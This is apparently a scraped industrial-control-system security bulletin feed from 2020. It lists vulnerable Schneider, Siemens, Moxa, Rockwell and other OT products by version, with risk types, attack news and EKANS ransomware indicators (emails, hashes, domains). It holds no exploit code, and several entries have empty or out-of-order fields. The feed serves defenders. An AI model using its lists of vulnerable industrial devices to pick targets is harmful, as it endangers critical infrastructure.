- ATV930/950/960/980/9A0/9B0 Altivar Process Drives 3.1IE24 and earlier versions
- SCADAPack 32 RTUs All versions 2.24 and earlier
- TM3BC bus coupler module EIP, SL and CANOpen all versions
- VW3A3720, VW3A3721 Altivar Process Communication Modules 1.15IE18 and earlier versions
- ZBRCETH Modbus TCP communication module for ZBRN1 Harmony Hub 02.03 and earlier versions
- XUPH001 OsiSense communication module all versions
- XGCS850C201 OsiSense RFID compact smart antenna all versions
- ACE850 Sepam communication interface all versions
- Acti9 PowerTag Link C and Link HD all versions
- Acti9 Smartlink IP, Acti9 Smartlink EL B and EL D, Acti9 Smartlink SI B and SI D all versions
- EcoStruxure Building SmartX IP MP and IP RP Controllers all versions
- Andover Continuum controller (NetController 1 (NC1) = model CX9900, NetController 2 (NC2) = model CX9680, ACX2 = models ACX5720 and ACX5740, series CX9200, series CX9400, CX9924, CX9702, series BCX4040, series BCX9640) all versions
- PowerLogic EGX300 Ethernet Gateway all versions
- EGX150/Link150 Ethernet Gateway all versions
- eIFE Ethernet Interface for circuit breakers MasterPact MTZ drawout all versions
- IFE Ethernet Interface for ComPact, PowerPact, and MasterPact circuit breakers all versions
- IFE Gateway all versions
- PowerLogic PM5000 series measuring station all versions
- TeSys T LTMR08EBD Motor Controller all versions
- Smart-UPS and Symmetra UPS Network Management Card 1 (NMC1) SmartSlot (models AP9617 (end of support Nov 2011), AP9619 (end of support Sep 2012), AP9618 (end of support Jan 2017), Audio/Video Network Management Enabled products (S20BLK, G50NETB2, G50NETB-20A2)) AOS 3.9.2 and earlier versions
- Network Management Card 3 (NMC3) SmartSlot (models AP9640/AP9640J, AP9641/AP9641J) AOS 1.3.0.6 and earlier versions
- Embedded NMC1 (Metered/Switched Rack PDUs with embedded NMC1, AP78XX, AP79XX) AOS 3.9.2 and earlier versions
- Embedded NMC2 (2G Metered/Switched Rack PDUs with embedded NMC2, AP84XX, AP86XX, AP88XX, AP89XX) AOS 6.8.8 and earlier versions
- Embedded NMC1 (Battery Management System, AP9921X, Rack Automatic Transfer Switches, AP77XX, AP9320, AP9340, AP9361, NetBotz NBRK0200, NetworkAir, InRow) AOS 3.9.2 and previous versions
- Embedded NMC2 (Battery Manager, AP9922, Rack Automatic Transfer Switches, AP44XX, NetBotz NBRK0250) AOS 6.8.8 and older
- Wiser Energy IP module by Schneider Electric (EER31800) all versions
- Wiser Energy IP module by Clipsal (EER72600) all versions
- Gateway Connector by Elko (EKO01827) all versions
- EcoStruxure™ Power Monitoring Expert versions 7.x, 8.x and 9.0
- EcoStruxure™ Energy Expert version 2.0
- Power Manager versions 1.1, 1.2 and 1.3
- StruxureWare™ PowerSCADA Expert with Advanced Reporting and Dashboards Module versions 8.x
- EcoStruxure™ Power SCADA Operation with Advanced Reporting and Dashboards Module version 9.0
- Acti9 Smartlink SI D and SI B 002.004.002 and earlier versions
- Acti9 PowerTag Link / Link HD 001.008.007 and earlier versions
- Acti9 Smartlink EL B 1.2.1 and earlier versions
- Wiser Link 1.5.0 and previous versions
- Wiser Energy 1.5.0 and previous versions
- EcoStruxure Machine Expert (previously SoMachine and SoMachine Motion) all versions
- E+PLC400, E+PLC100 and E+PLC_Setup all versions
- EcoStruxure Expert SCADA Machine all versions
- M340 CPUs (BMX P34x) firmware versions prior to 3.20
- M340 Communication Ethernet modules BMX NOE 0100 (H) versions prior to 3.3, BMX NOE 0110 (H) versions prior to 6.5, BMX NOC 0401 versions prior to 2.10
- Premium processors with integrated Ethernet COPRO (TSXP574634, TSXP575634, TSXP576634) versions prior to 6.1
- Premium communication modules TSXETY4103 versions earlier than 6.2, TSXETY5103 versions earlier than 6.4
- Quantum processors with integrated Ethernet COPRO 140CPU65xxxxx versions prior to 6.1
- Quantum communication modules 140NOE771x1 versions previous to 7.1, 140NOC78x00 versions previous to 1.74, 140NOC77101 versions previous to 1.08

Vulnerability risks:
- Remote execution of arbitrary code
- Denial of Service
- Bypassing the security policy
- Data Integrity Breaches
- Breach of confidentiality of data

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] LCDS LAquis SCADA

14/10/2020

Vulnerability affects :
- LCDS LAquis SCADA - versions prior to 4.3.1.870.

Vulnerability risks:
- Execution of code under the privileges of the application

See the documents below for more information
Sources :

[VULNERABILITY] FieldComm

14/10/2020

Vulnerability affects :
- HART-IP Developer kit – version 1.0.0.0
- hipserver – versions prior to v3.7.0

Vulnerability risks:
- Buffer overflow
- Authentication bypass

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Moxa Nport IAW5000A-I/O

14/10/2020

Vulnerability affects :
- Moxa NPort IAW5000A-I/O Series Serial Device Servers – versions 2.1 and prior

Vulnerability risks:
- hijack the session by stealing the user’s cookies
- privilege escalation
- Authentication bypass

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple vulnerabilities in Siemens products

14/10/2020

Vulnerability affects :
- Multiple Web Application Vulnerabilities in Desigo Insight
- Authentication Bypass Vulnerability in SIPORT MP
- Improper Password Protection during Authentication in SIMATIC S7-300 and S7-400 CPUs and Derived Products
- Vulnerabilities in Intel CPUs (November 2019)
- Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP
- WIBU Systems CodeMeter Runtime Vulnerabilities in Siemens and Siemens Energy Products
- Vulnerability known as TCP SACK PANIC in Industrial Products
- Special Register Buffer Data Sampling (SRBDS) aka Crosstalk in Industrial Products
- DNSMasq Vulnerabilities in SCALANCE W1750D, SCALANCE M-800 / S615 and RUGGEDCOM RM1224

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] PcVue, WebVue, WebScheduler, TouchVue

13/10/2020

Vulnerability affects PcVue :
- ARC Informatique PcVue 12.0.7 (including) through 12.0.17 (excluding)
- ARC Informatique PcVue 8.10 (including) through 12.0.17 (excluding)
- WebVue, WebScheduler and TouchVue

Vulnerability risks:
- DoS
- RCE

Proof-of-concept code exists for these vulnerabilities.
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELSEC iQ-R Series

08/10/2020

Vulnerability affects MELSEC iQ-R series modules :
- R00/01/02CPU: Firmware Versions 7 or earlier
- R04/08/16/32/120CPU, R04/08/16/32/120ENCPU: Firmware Versions 39 or earlier
- R08/16/32/120SFCPU: Firmware Versions 20 or earlier
- R08/16/32/120PCPU: Firmware Versions 24 or earlier
- R08/16/32/120PSFCPU: Firmware Versions 05 or earlier
- Versions 49 or earlier

Vulnerability risks:
- Denial-of-service condition due to uncontrolled resource consumption

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Johnson Controls Sensormatic Electronics American Dynamics victor Web Client

08/10/2020

Vulnerability affects :
- American Dynamics victor Web Client: All versions up to and including v5.4.1

Vulnerability risks:
- DoS
- RCE (delete arbitrary files on the system)

See the documents below for more information
Sources :
CVE :

[ATTACK] Azerbaijan's energy infrastructure targeted by attacks

06/10/2020

These campaigns mainly target wind turbines and the public energy sector in Azerbaijan.
Sources :

[ATTACK] Phishing campaigns against Russian companies

06/10/2020

Spear phishing campaigns threaten Russian fuel and energy companies.
Sources :

[VULNERABILITY] Stormshield Network Security (SNi40 and SNi20)

05/10/2020

Vulnerability affects:
- Stormshield Network Security (SNS) versions prior to 4.1.1 (check)

Vulnerability risks:
- Remote denial of service
- Data privacy breach
- Privilege escalation

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] WideField3 - Yokogawa

03/10/2020

Vulnerability affects:
- WideField3 R1.01 - R4.0

Vulnerability risks:
- Buffer overflow when loading a malicious project file, causing the application to terminate abnormally
Sources :
CVE :

[VULNERABILITY] mymbCONNECT24 and mbCONNECT24 - MB Connect Line

02/10/2020

Vulnerability affects:
- mymbCONNECT24 v2.6.1 and prior
- mbCONNECT24 v2.6.1 and prior

Vulnerability risks:
- Cross-Site Request Forgery
- SQL injection
- Remote code execution

Sources :
CVE :
- [EN] CVE-2020-24569
- [EN] CVE-2020-24568
- [EN] CVE-2020-24570

[VULNERABILITY] SiteManager GateManager

02/10/2020

Vulnerability affects:
- SiteManager all versions prior to v9.2.620236042
- GateManager 4260 and 9250 all versions prior to v9.0.20262
- GateManager 8250 all versions prior to v9.2.620236042

Vulnerability risks:


> ###### Sources :
- [EN] [OTORIA](https://www.otorio.com/news-events/press-release/otorio-discovers-critical-vulnerabilities-in-leading-industrial-remote-access-software-solutions/)
- [EN] [The Hacker News](https://thehackernews.com/2020/10/industrial-remote-access.html)
- [EN] [CISA](https://us-cert.cisa.gov/ics/advisories/icsa-20-273-03)
- [DE] [CERT DE](https://cert.vde.com/de-de/advisories/vde-2020-035)
- [EN] [BR AUTOMATION](https://www.br-automation.com/downloads_br_productcatalogue/assets/1600003183756-de-original-1.0.pdf)

> ###### CVE :
> - [EN] [CVE-2020-11641](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11641)
> - [EN] [CVE-2020-11642](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11642)
> - [EN] [CVE-2020-11643](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11643)
> - [EN] [CVE-2020-11644](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11644)
> - [EN] [CVE-2020-11645](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11645)
> - [EN] [CVE-2020-11646](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11646)

---
## [VULNERABILITY] Cisco IOS Software
_25/09/2020_

Vulnerability affects:

Vulnerability risks:

If the following command returns information, the device is vulnerable: `show control-plane host open-ports`


> ###### Sources :
- [FR] [ANSSI](https://www.cert.ssi.gouv.fr/avis/CERTFR-2020-AVI-602/)
- [EN] [Cisco](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ios-lpwa-access-cXsD7PRA)

> ###### CVE :
> - [EN] [CVE-2020-3426](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3426)


---
## [RESOURCES]
_25/09/2020_

> [EN] [Kaspersky ICS CERT](https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf)

The report looks back at the WildPressure campaign in the Middle East with the Milum malware. Kaspersky also returns to the campaign against Azerbaijan with the RAT PoetRAT and the attacks on water plants in Israel.

---

## [VULNERABILITY] Wibu-Systems AG
_25/09/2020_

Vulnerability affects:

Vulnerability risks:

CVE :

[VULNERABILITY] Siemens

11/08/2020

Vulnerability affects:
- RUGGEDCOM RM1224 versions prior to 6.3
- SCALANCE M-800 / S615 versions prior to 6.3
- Desigo CC versions V4.x without the latest security patch
- Desigo CC versions V3.x without the latest security patch
- Desigo CC Compact versions V4.x without latest security patch
- Desigo CC Compact versions V3.x without latest security patch
- SICAM WEB firmware for SICAM A8000 RTUs versions prior to V05.30
- Automation License Manager versions prior to V6.0.8
- SIMATIC RF350M
- SIMATIC RF650M
- SIMOTICS CONNECT 400

Vulnerability risks:
- Remote execution of arbitrary code
- Data Integrity Breaches
- Breach of confidentiality of data
- Elevation of privileges
- Cross-site scripting (XSS)
Sources :
CVE :

[VULNERABILITY] Schneider Electric

11/08/2020

Vulnerability affects:
- APC Easy UPS On-Line versions prior to V2.1
- Schneider Electric Modbus Serial Driver (64 bit) versions prior to V3.20 IE 30
- Schneider Electric Modbus Serial Driver (32 bit) versions prior to V2.20 IE 30
- Schneider Electric Modbus Driver Suite versions prior to V14.15.0.0
- spaceLYnk versions prior to V2.5.1
- Wiser for KNX (formerly homeLYnk) versions prior to V2.5.1
- PowerChute Business Edition versions prior to V9.1
- SoMove versions prior to V2.8.2
- Harmony eXLhoist versions prior to V04.00.03.00
- Modicon M218 Logic Controller versions prior to V5.0.0.8

Vulnerability risks:
- Remote execution of arbitrary code
- Remote denial of service
- Circumvention of security policy
- Breach of confidentiality of data
- Elevation of privileges
CVE :
Sources :

[VULNERABILITY] Schneider Electric Triconex

31/07/2020

The following equipment is affected by several vulnerabilities (RCE, DoS and data leak) :
 - TriStation 1131 versions prior to 4.13.0
 - Tricon TCM Model 4351, 4352, 4351A/B and 4352A/B versions prior to 10.5.4
CVE :
Sources :

[VULNERABILITY] Industrial VPN servers

28/07/2020

The following products are affected :
- Secomea GateManager (RCE / DoS / Hard-coded credentials)
- Moxa EDR-G902/3 (RCE)
- HMS Networks' eWon (RCE)
The most severe vulnerability allows an attacker to take full control of the equipment. According to Shodan, 253 VPN instances are exposed and vulnerable.
Secomea and Moxa patches are available.
CVE :
Sources :

[ATTACK] Cyber attack on Israeli water infrastructure

22/07/2020

The attackers reportedly targeted cellular routers in order to get into the systems.
The April attacks appeared to target several water and sewage treatment facilities.
Last week's attacks were aimed at smaller water pumping systems in the agricultural sector.
According to SecurityWeek, the attackers managed to get into the systems without causing significant damage.
The recent cyber attacks on a major Iranian port appear to be Israel's response, although neither side has admitted to launching an attack.
Sources :

[VULNERABILITY] Siemens

16/07/2020

The products affected are :
 - Opcenter Execution Discrete prior to v3.2
 - Opcenter Execution Foundation prior to v3.2
 - Opcenter Execution Process prior to v3.2
 - Opcenter Execution Core prior to v8.2
 - Opcenter Intelligence
 - Opcenter Quality prior to 11.3
 - Opcenter RD&L prior to 8.1
 - Camstar Enterprise Platform : a migration to Opcenter Execution Core 8.2 is required
 - SIMATIC IT LMS, Production Suite, Notifier Server for Windows, PCS neo
 - SIMATIC STEP 7 (TIA Portal) v15
 - SIMATIC STEP 7 (TIA Portal) v16 prior to V16 update 2
 - SIMOCODE ES and Soft Starter ES
 - SPPA-T3000 Application Server and Terminal Server
 - SPPA-T3000 APC UPS with NMC AP9630 or AP9631
 - SIMATIC S7-200 SMART CPU prior to V2.5.1
 - LOGO! 8 BM (and SIPLUS) prior to V1.81.04
 - LOGO! 8 BM (and SIPLUS) prior to V1.82.03
 - LOGO! 8 BM (and SIPLUS) prior to V1.82.04
 - SIMATIC S7-300 CPU (and ET200 CPUs and SIPLUS) prior to V3.X.17
 - SIMATIC TDC CP51M1 prior to V1.1.8
 - SIMATIC TDC CPU555 prior to V1.1.1
 - SINUMERIK 840D sl prior to V4.8.6
 - SINUMERIK 840D sl prior to V4.94
 - SIMATIC HMI Basic Panels first and second generation, Comfort Panels, Mobile Panels second-generation (and SIPLUS)
 - SIMATIC HMI KTP700F Mobile Arctic
 - SIMATIC WinCC Runtime Advanced
 - SICAM MMU prior to V2.05
 - SICAM SGU
 - SICAM T prior to V2.18
CVE :
Sources :

[VULNERABILITY] Moxa MGate 5105-MB-EIP

14/07/2020

Two vulnerabilities have been discovered in the Moxa MGate 5105-MB-EIP product (firmware version 4.2 or lower).
CVE :
Sources :

[VULNERABILITY] Ripple20 - update

30/06/2020

New industrial equipment is vulnerable to Ripple20 :
- FANUC Robotics
- Control Techniques (NIDEC)
- B&B Electronics
- Mitsubishi Electric
- Schweitzer Engineering
Sources :

[ATTACK] French wind infrastructure attack

30/06/2020

The French newspaper L'Express revealed that a custom version of the BlackEnergy malware had been discovered in the installations of a wind farm in Enedis.
Sources :

[VULNERABILITY] FactoryTalk - Rockwell Automation

24/06/2020

A vulnerability in the redundancy service (RdcyHost.exe) of FactoryTalk (Rockwell Automation) stems from the service not verifying credentials.
By exploiting this vulnerability an attacker can execute code remotely with high privileges.
CVE :
Sources :

[VULNERABILITY] Mitsubishi Electric and its subsidiary ICONICS

23/06/2020

Several critical flaws have been discovered in Mitsubishi Electric equipment and products of its subsidiary ICONICS.
The vulnerabilities allow remote code execution (RCE).
The following products are affected :
- GENESIS64
- Hyper Historian
- AnalytiX
- MobileHMI
- GENESIS32
- BizViz
The following pieces of equipment are also affected:
- MC Works64 Version 4.02C (10.95.208.31) and earlier, all versions
- MC Works32 Version 3.00A (9.50.255.02)
Sources :

[VULNERABILITY] OSIsoft PI System

22/06/2020

OTORIO researchers discovered a stored XSS in version 1.12.0.6346 and earlier of OSIsoft PI System (developed by PI System).
To exploit the vulnerability, an attacker needs access to the storage engine of the PI Server.
Risks : phishing, privilege escalation.
A patch has been released.
CVE :
Sources :

[VULNERABILITY] Ripple20

18/06/2020

Ripple20 is a set of vulnerabilities in the TCP/IP stack from Treck, Inc.
These vulnerabilities notably impact Schneider Electric and Rockwell Automation equipment.
The list of affected vendors is in the JSOF article (see sources).
CVE :
Sources :

18/06/2020

Cybereason


[VULNERABILITY] Multiple important vulnerabilities in Schneider Electric products

17/06/2020

Several Schneider Electric products are impacted by important vulnerabilities:
 - U.motion Servers (SQL Injection, Improper Access Control )
 - Touch Panels (SQL Injection, Improper Access Control )
 - Unity Loader (Hard-coded Credentials)
 - OS Loader Software (Hard-coded Credentials)
 - EcoStruxure Operator Terminal Expert 3.1 Service Pack 1 (Path Traversal, Argument Injection, SQL Injection)
 - GP-Pro EX V1.00 to V4.09.100 (Weak password)
 - Easergy T300 (Traffic interception, read configuration data, third-party component vulnerabilities, risky cryptographic algorithm, read private keys, privilege elevation, delete files, full access by brute force, DoS, directory information exposure, code execution, CSRF)
 - Modicon M218 Logic Controller (DoS)
CVE :

[VULNERABILITY] Rockwell

15/06/2020

Multiple vulnerabilities have been discovered in Rockwell Automation software.
The following products are impacted :
- FactoryTalk Linx versions 6.00, 6.10, and 6.11
- RSLinx Classic v4.11.00 and prior
- Connected Components Workbench: Version 12 and prior
- ControlFLASH: Version 14 and later
- ControlFLASH Plus: Version 1 and later
- FactoryTalk Asset Centre: Version 9 and later
- FactoryTalk Linx CommDTM: Version 1 and later
- Studio 5000 Launcher: Version 31 and later
- Studio 5000 Logix Designer software: Version 32 and prior
CVE :

[VULNERABILITY] Moxa EDR-G902/G903

15/06/2020

Moxa EDR-G902 and EDR-G903 products in firmware version 5.4 or lower are affected by a stack buffer overflow vulnerability triggered through a malicious cookie.
A patch has been released.
Sources :

[VULNERABILITY] Mitsubishi Controllers MELSEC iQ-R

12/06/2020

This vulnerability impacts the MELSEC iQ-R CPU modules from Mitsubishi Electric.
The resulting DoS condition affects the operation of the PLC. Mitsubishi has released a patch.
CVE :

CVE-2020-13238

Sources :

[ATTACK] [RANSOMWARE] EKANS/SNAKE at Honda and Enel

10/06/2020

The EKANS/SNAKE ransomware paralysed 11 Honda factories (5 in the USA, 2 in Brazil, India and Turkey).
This ransomware has features that target industrial systems.
In the case of Honda and the Enel group, the favoured hypothesis is an RDP service exposed to the Internet.

Publication FR : EKANS ransomware PDF

IOCs EKANS/SNAKE

General :

  • MAIL : bapcocrypt@ctemplar.com
  • SHA-256 : e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60

File at Honda :

  • MAIL : CarrolBidell@tutanota.com
  • SHA-256 : d4da69e424241c291c173c8b3756639c654432706e7def5025a649730868c4a1
  • Domain : mds.honda.com

File at Enel :

  • MAIL : CarrolBidell@tutanota.com
  • SHA-256 : edef8b955468236c6323e9019abb10c324c27b4f5667bc3f85f3a097b2e5159a
  • Domain : enelint.global

YARA rules :

On Malpedia

MITRE ATT&CK TIDs :

On VMware carbonblack

Sources :

[VULNERABILITY] Schneider Electric Easergy

10/06/2020

Multiple vulnerabilities on Schneider Electric Easergy T300 products earlier than 2.7 and Easergy Builder products earlier than 1.6.3.0.
Risks :
  - Remote execution of arbitrary code
  - Remote denial of service
  - Data Integrity Breaches
  - Breach of confidentiality of data
  - Elevation of privileges
  - Cross-site request forgery (CSRF)
CVE :

CVE-2020-7503 to CVE-2020-7519

Sources :

[VULNERABILITY] Siemens

09/10/2020

Multiple Siemens vulnerabilities in SIMATIC, SINEMA, SINUMERIK and LOGO! 8 BM products. Risks :
- Remote execution of arbitrary code
- Denial of Service
- Circumvention of security policy
- Data Integrity Breaches
- Breach of confidentiality of data
CVE :
- CVE-2020-7580
- CVE-2020-7585 and CVE-2020-7586
- CVE-2020-7589
- CVE-2018-15361
- CVE-2019-8258 to CVE-2019-8277
- CVE-2019-8280
Sources :